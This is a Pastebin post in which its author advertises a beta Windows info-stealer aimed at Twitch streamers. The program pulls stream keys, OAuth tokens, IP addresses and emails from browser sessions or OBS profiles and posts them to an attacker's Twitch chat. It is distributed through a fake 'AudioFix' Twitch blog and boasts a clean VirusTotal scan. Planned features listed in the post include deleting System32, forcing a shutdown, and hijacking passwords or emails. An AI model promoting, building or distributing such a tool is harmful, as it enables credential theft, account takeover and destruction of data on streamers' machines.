Advertisement
Guest User

Untitled

a guest
Mar 20th, 2017
402
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.51 KB | None | 0 0
  1. This program, upon execution, will post the user's stream key and send it to Twitch chat (http://www.twitch.tv/anon_bot)Â automatically
  2.  
  3. BETA Phase: Needs Testing! Early Revision!
  4. Please report bugs and leave suggestions below
  5.  
  6.  
  7.  
  8. The program is still in console due to the need for a smaller size and cross-compatibility with other operating systems. I've got working GUI versions, but they require dependencies that are way too large to bundle. It was created in Python 3.4 and does NOT require administrative privileges of any sort.
  9.  
  10. Features:
  11. Automatically posts the stream key, OAuth, IP, and email of the streamer with the click of a button
  12. No Admin rights needed
  13. Works on FireFox and Chrome login sessions (IE support might come later)
  14. [NEW] Works on OBS Profiles (if there are no login sessions)
  15. Sets the stream title to "Le Toucan has Arrived (StepTech)"
  16. Is pretty fast, delays itself on the Twitch IRC to make sure messages get across
  17.  
  18. Requires:
  19. The streamer must be logged into Twitch on either Chrome and/or FireFox (it will get both sessions, if they exist)
  20. Windows (Mac support coming later, tested on Windows 7, 8, 10Â so far)
  21. Planned Features(?):
  22. Mac Support (I've got cross compatible code, I just want everyone to test the Windows version first and report bugs)
  23. This program has access to all user saved logins and saved sessions, should I utilize this or dump it? (Ethical Concerns)
  24. Include removing System 32?
  25. Automatic Shutdown of PC after execution to allow someone to utilize the stream key
  26. Utilize the user session to change the password and/or email?
  27. Changelog:
  28. v0.01 - Initial Release, Testing Needed
  29. v0.02 - Support for 32 bit Windows
  30. v0.03 - Fallback onto extracting OBS Stream Keys if it cannot get cookies
  31.      - Added delay at the end to see the progress messages     Â
  32. Â Â Â Â Â Â - Added additional progress messages for every step of the program
  33. The results of the program will be automatically posted in the chat on this channel (if successful):Â
  34. http://www.twitch.tv/anon_bot
  35.  
  36. The program is hosted on a traditional "AudioFix" Fake Twitch Blog here:
  37. http://twitch-blog.cf/
  38.  
  39.  
  40.  
  41. Virus Total Scan of the EXE:Â
  42. https://www.virustotal.com/en/file/fbdf448a82fef6ea5734a2bd245609e1e1e8857fa20123391111a545666003b3/analysis/1427493853/
  43. 0/55 Detected
  44. The other components are just known and proven library dependencies for proper Python execution
  45. (even if the user doesn't have Python installed)
  46.  
  47.  
  48. Anon_on_the_weekend, Pioneer of AudioFix
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement